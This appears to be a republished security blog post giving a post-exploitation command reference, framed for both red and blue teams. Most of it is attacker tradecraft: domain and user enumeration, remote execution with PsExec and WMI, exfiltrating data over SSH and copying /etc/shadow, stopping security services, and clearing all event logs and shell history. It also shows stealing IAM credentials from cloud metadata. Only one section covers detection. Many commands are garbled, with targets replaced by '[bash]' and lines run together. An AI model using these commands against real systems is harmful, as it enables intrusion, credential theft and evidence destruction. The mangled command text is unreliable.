Listen to this Post
Introduction:
The line between offensive security (Red Team) and defensive security (Blue Team) is increasingly blurred in modern cybersecurity. To effectively defend a network, one must think like an attacker, understanding the tools and techniques used in post-exploitation. This article provides a critical command reference for security professionals to fortify their environments and test their defenses.
Learning Objectives:
- Master essential post-exploitation commands for Windows and Linux environments.
- Learn key techniques for reconnaissance, lateral movement, and persistence.
- Implement defensive commands to detect and mitigate these offensive actions.
You Should Know:
1. Network Reconnaissance & Discovery
After gaining initial access, an attacker must map the network to identify valuable targets.
Windows (PowerShell):
Get-NetTCPConnection | Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort, State | Format-Table Get-NetIPConfiguration -Detailed nltest /dclist:[bash] net view /domain
Step-by-step guide:
The `Get-NetTCPConnection` cmdlet displays all active network connections, helping to identify communication with command and control servers. `Get-NetIPConfiguration` provides detailed interface data. For domain environments, `nltest /dclist` enumerates domain controllers, and `net view /domain` lists all domains trusted by the current domain, mapping the attack surface.
Linux:
netstat -tulnp ip addr show cat /etc/resolv.conf arp -a
Step-by-step guide:
`netstat -tulnp` shows listening ports and the associated processes, crucial for finding services to exploit. `ip addr show` reveals all network interfaces, including potential hidden ones. Checking `/etc/resolv.conf` exposes the DNS servers, and `arp -a` lists hosts on the local network segment for lateral movement planning.
2. User & Privilege Enumeration
Understanding who you are and what privileges you hold is the first step to escalation.
Windows (CMD & PowerShell):
whoami /all net user [bash] net localgroup administrators net group "Domain Admins" /domain
Get-LocalUser | Where-Object {$_.Enabled -eq $True}
Step-by-step guide:
`whoami /all` displays the current user, their Security Identifiers (SIDs), and group memberships. `net user` queries information about a specific user account. `net localgroup administrators` and `net group “Domain Admins” /domain` are critical for identifying high-value targets for privilege escalation attacks. The PowerShell cmdlet provides a filtered list of all enabled local users.
Linux:
id who -a cat /etc/passwd | grep -v "nologin" sudo -l
Step-by-step guide:
The `id` command gives a comprehensive view of user and group identities. `who -a` shows all logged-in users. Parsing `/etc/passwd` while excluding non-login shells reveals valid user accounts. Most importantly, `sudo -l` lists the commands the current user is allowed to run with elevated privileges, a common misconfiguration leading to privilege escalation.
3. Lateral Movement Techniques
Moving from one compromised host to another is key to reaching critical assets.
Windows (PSEXEC & WMI):
psexec.exe \[bash] cmd.exe wmic /node:"[bash]" process call create "cmd.exe /c whoami > C:\output.txt"
Step-by-step guide:
PsExec, part of the Sysinternals suite, is a classic tool for executing processes on remote systems, requiring valid administrator credentials. The Windows Management Instrumentation (WMI) command performs a similar function, creating a process on a remote host. Blue Teams should monitor for these remote execution patterns.
Linux (SSH Keys & SCP):
ssh-copy-id user@[bash] ssh user@[bash] 'tar cf - /important_data | base64' scp user@[bash]:/etc/shadow ./
Step-by-step guide:
`ssh-copy-id` installs a public key on the target host, enabling password-less SSH access for persistent, stealthy lateral movement. The `ssh` command can be used to execute commands remotely, such as archiving and exfiltrating data. `scp` securely copies files between hosts, which can be used to steal sensitive files like the shadow password file.
4. Process & Service Manipulation
Attackers often manipulate services to establish persistence or disable defenses.
Windows (SC & Taskkill):
sc \[bash] query [bash] sc \[bash] stop [bash] sc \[bash] config [bash] start= disabled taskkill /IM [bash] /F
Step-by-step guide:
The Service Control (sc) command is a powerful tool for querying, stopping, and reconfiguring services remotely. An attacker may stop security services like antivirus or endpoint protection. The `taskkill` command forcefully terminates processes, which can be used to disrupt security tools or other system functions.
Linux (Systemctl & Kill):
systemctl list-units --type=service systemctl stop [bash] systemctl disable [bash] kill -9 $(pgrep [bash])
Step-by-step guide:
`systemctl` is the controller for modern init systems. Listing services helps identify potential targets. Stopping and disabling services can cripple security monitoring or create backdoors. The `kill -9` command sends a SIGKILL signal, which cannot be caught or ignored, to forcefully terminate a process based on its name.
5. Log & Evidence Tampering
To maintain stealth, attackers will often attempt to cover their tracks.
Windows (Clear Event Logs):
wevtutil el | Foreach-Object {wevtutil cl "$_"}
Remove-Item -Path C:\Windows\Temp\ -Recurse -Force
Step-by-step guide:
This PowerShell one-liner uses `wevtutil` to list all event logs (wevtutil el) and then clears each one (wevtutil cl). This is a destructive action that obliterates forensic evidence. The `Remove-Item` cmdlet is used to clean up temporary directories where tools or scripts may have been staged.
Linux (Shred & Clear History):
shred -zuf [bash] echo '' > ~/.bash_history && history -c find / -name ".tmp" -type f -delete 2>/dev/null
Step-by-step guide:
The `shred` command overwrites a file multiple times before deleting it, making forensic recovery difficult. Clearing the bash history file and the current session’s history with `history -c` removes evidence of commands run. The `find` command can be used to locate and delete temporary files created during the attack across the entire filesystem.
6. Defensive Countermeasures & Detection
A strong Blue Team must actively hunt for these techniques.
Windows (Audit Policy & Sysmon):
auditpol /get /category: Get-WinEvent -LogName Security -FilterXPath "[System[(EventID=4624)]]" | Select-Object -First 10
Step-by-step guide:
`auditpol` checks the current audit policy, ensuring that critical events like logons and process creation are being logged. The PowerShell command retrieves recent successful logon events (Event ID 4624) from the Security log, which is vital for detecting lateral movement. Tools like Sysmon should be deployed for deeper process and network visibility.
Linux (Auditd & Fail2ban):
auditctl -l ausearch -k "privilege-escalation" -i fail2ban-client status [bash]
Step-by-step guide:
`auditctl -l` lists the active Auditd rules, which should be configured to monitor sensitive files and privileged commands. `ausearch` queries the audit logs for specific keys, such as those related to privilege escalation attempts. Checking the status of `fail2ban` for the SSH service confirms if brute-force protection is active.
7. Cloud Instance Metadata Exploitation
In cloud environments, the Instance Metadata Service is a prime target.
AWS & Azure Curl Commands:
AWS IMDSv1 (deprecated but often found) curl http://169.254.169.254/latest/meta-data/ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/[bash] AWS IMDSv2 (more secure) TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600") curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/ Azure curl -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
Step-by-step guide:
If an attacker gains code execution on a cloud instance, they can query the metadata service. In AWS, this can reveal IAM credentials, which are often over-permissioned and can lead to full cloud account compromise. The shift to IMDSv2 requires a token, making exploitation harder. Blue Teams must enforce IMDSv2 and ensure instance roles follow the principle of least privilege.
What Undercode Say:
- The modern defender must be fluent in the language of the attacker. Command-line proficiency is not optional.
- True security maturity is measured by detection and response capabilities, not just prevention. Knowing these commands allows for the creation of robust detection rules.
The commands detailed here represent the daily tools of the trade for both offensive and defensive security practitioners. The critical analysis is that defense is no longer about building impenetrable walls; this has proven impossible. Instead, the focus must be on assuming breach, limiting the blast radius through strict segmentation and least privilege, and developing the capability to rapidly detect and respond to these common post-exploitation activities. Monitoring for the execution of wevtutil cl, remote service control via sc, or outbound connections from unexpected processes is now more valuable than any single preventative control.
Prediction:
The continued integration of AI into security operations will lead to an arms race in command-line obfuscation and living-off-the-land technique (LOLBin) abuse. AI-powered security tools will get better at detecting anomalous command sequences, but attackers will simultaneously use AI to generate highly evasive, context-aware scripts that mimic legitimate administrative activity. The fundamental commands will remain, but the context and execution patterns will become the new battlefield, making deep technical knowledge and advanced behavioral analytics paramount for defense.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Otsecurityprofessionals Otsecprotip – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
